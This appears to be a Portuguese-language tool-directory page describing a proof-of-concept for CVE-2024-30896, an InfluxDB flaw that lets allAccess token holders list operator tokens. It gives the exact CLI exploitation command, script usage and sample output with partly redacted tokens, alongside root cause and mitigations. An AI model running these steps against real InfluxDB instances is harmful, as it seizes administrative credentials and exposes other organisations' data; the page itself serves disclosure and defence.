Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-30896 — Exploit de prova de conceito para CVE-2024-30896, uma vulnerabilidade de escalada de privilégios no InfluxDB que permite que detentores de token allAccess obtenham acesso de nível de operador via listagem de tokens de autorização. | Kitploit
Ferramentas/GitHubGitHub/xenom0rph97/cve-2024-30896
Autenticação e AutorizaçãoEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoSegurança na NuvemSegurança de Banco de Dados
GitHubxenom0rph97/cve-2024-30896

CVE-2024-30896

Exploit de prova de conceito para CVE-2024-30896, uma vulnerabilidade de escalada de privilégios no InfluxDB que permite que detentores de token allAccess obtenham acesso de nível de operador via listagem de tokens de autorização.

Ver Repositório
212há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-30896

Resumo

Uma falha de lógica de negócios no influxdb permite que usuários que possuam um token allAccess válido aumentem seus privilégios ao nível de operador listando os tokens de autorização atuais.

Cenário

O atacante pode ser um usuário que recebeu acesso de um administrador por meio de um token allAccess apenas dentro da sua organização. As permissões desse usuário permitirão controle total sobre a organização, mas ainda assim o impedirão de interagir com outras organizações.

Impacto

Essa vulnerabilidade permitiria que um usuário obtivesse acesso irrestrito à instância do influxdb. Uma condição semelhante pode comprometer totalmente a Confidencialidade, a Integridade e a Disponibilidade dos dados pertencentes a usuários de diferentes organizações. Além disso, como o token de operador possui permissões administrativas, a Disponibilidade e a Integridade de toda a instância do influxdb podem ser comprometidas.

Pré-requisitos/Limitações

  1. O atacante deve ter um token allAccess válido
  2. O token allAccess deve ter sido criado na mesma Org onde reside um token de operador (ex.: mesma Org do usuário Admin)
  3. O atacante deve ser capaz de interagir com a instância do influxdb via CLI ou APIs (influxClient)

Passos para Reproduzir

Caso 1: Exploração via APIs do influxdb:

Uso do script

root@kitploit:~
% python3 ./influxdbPrivescCVE_PoC.py -h
usage: influxdbPrivescCVE_PoC.py [-h] [-t TOKEN] [-e ENDPOINTURL] [-v [VERBOSE]] [-vv [VVERBOSE]]

optional arguments:
  -h, --help            show this help message and exit
  -t TOKEN, --token TOKEN
                        Custom or allAccess token to access influx DB instance
  -e ENDPOINTURL, --endpointUrl ENDPOINTURL
                        Endpoint Url of influxdb instance (ex. "https://myInfluxdbInstance:8086/")
  -v [VERBOSE], --verbose [VERBOSE]
                        Enable verbose logging - INFO
  -vv [VVERBOSE], --vverbose [VVERBOSE]
                        Enable verbose logging - DEBUG

Caso 2: Exploração via CLI do influx

  1. Execute: influx auth ls -t <allAccessToken> | grep write:/orgs. Isso listará todos os tokens de operador ativos atuais na instância do influxdb.

Exemplo

root@kitploit:~
# Using an allAccess token 
influx auth ls -t U1OuqmFC{REDACTED} | grep U1OuqmFC{REDACTED}

0cc41c3b050e5000							U1OuqmFC{REDACTED}	
admin		0cb9c92ee228b000	[read:orgs/87d0746948a3b3f5/authorizations write:orgs/87d0746948a3b3f5/authorizations read:orgs/87d0746948a3b3f5/buckets write:orgs/87d0746948a3b3f5/buckets read:orgs/87d0746948a3b3f5/dashboards write:orgs/87d0746948a3b3f5/dashboards read:/orgs/87d0746948a3b3f5 read:orgs/87d0746948a3b3f5/sources write:orgs/87d0746948a3b3f5/sources read:orgs/87d0746948a3b3f5/tasks write:orgs/87d0746948a3b3f5/tasks read:orgs/87d0746948a3b3f5/telegrafs write:orgs/87d0746948a3b3f5/telegrafs read:/users/0cb9c92ee228b000 write:/users/0cb9c92ee228b000 read:orgs/87d0746948a3b3f5/variables write:orgs/87d0746948a3b3f5/variables read:orgs/87d0746948a3b3f5/scrapers write:orgs/87d0746948a3b3f5/scrapers read:orgs/87d0746948a3b3f5/secrets write:orgs/87d0746948a3b3f5/secrets read:orgs/87d0746948a3b3f5/labels write:orgs/87d0746948a3b3f5/labels read:orgs/87d0746948a3b3f5/views write:orgs/87d0746948a3b3f5/views read:orgs/87d0746948a3b3f5/documents write:orgs/87d0746948a3b3f5/documents read:orgs/87d0746948a3b3f5/notificationRules write:orgs/87d0746948a3b3f5/notificationRules read:orgs/87d0746948a3b3f5/notificationEndpoints write:orgs/87d0746948a3b3f5/notificationEndpoints read:orgs/87d0746948a3b3f5/checks write:orgs/87d0746948a3b3f5/checks read:orgs/87d0746948a3b3f5/dbrp write:orgs/87d0746948a3b3f5/dbrp read:orgs/87d0746948a3b3f5/notebooks write:orgs/87d0746948a3b3f5/notebooks read:orgs/87d0746948a3b3f5/annotations write:orgs/87d0746948a3b3f5/annotations read:orgs/87d0746948a3b3f5/remotes write:orgs/87d0746948a3b3f5/remotes read:orgs/87d0746948a3b3f5/replications write:orgs/87d0746948a3b3f5/replications]

# Listing all available tokens passing allAccess token and retrieving only operator level tokens
influx auth ls -t U1OuqmFC{REDACTED} | grep write:/orgs

0cbb920e128e5000							gerKYLO0Ph_ibUk0y{REDACTED}
admin		0cb9c92ee228b000	[read:/authorizations write:/authorizations read:/buckets write:/buckets read:/dashboards write:/dashboards read:/orgs write:/orgs read:/sources write:/sources read:/tasks write:/tasks read:/telegrafs write:/telegrafs read:/users write:/users read:/variables write:/variables read:/scrapers write:/scrapers read:/secrets write:/secrets read:/labels write:/labels read:/views write:/views read:/documents write:/documents read:/notificationRules write:/notificationRules read:/notificationEndpoints write:/notificationEndpoints read:/checks write:/checks read:/dbrp write:/dbrp read:/notebooks write:/notebooks read:/annotations write:/annotations read:/remotes write:/remotes read:/replications write:/replications]

Causa Raiz

Por padrão, os tokens allAccess têm permissões para listar todas as autorizações definidas na mesma Org, sem restrições baseadas no tipo (custom, allAccess, operator) -> read:orgs/87d0746948a3b3f5/authorizations.

Mitigação Temporária

Quando executado, o influx setup criará a primeira org (padrão), na qual um token de operador será armazenado automaticamente. Os usuários devem receber acesso apenas às organizações secundárias criadas. Recomenda-se criar múltiplas organizações e repassar aos usuários apenas aquelas que não contenham um token de operador.

Recomendações

  • Não compartilhe nenhuma organização que contenha um token de operador
  • Evite armazenar tokens de operador em orgs não padrão

Pontuação Base CVSS: 9.1

Vetor CVSS v3.1: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Baixar ferramenta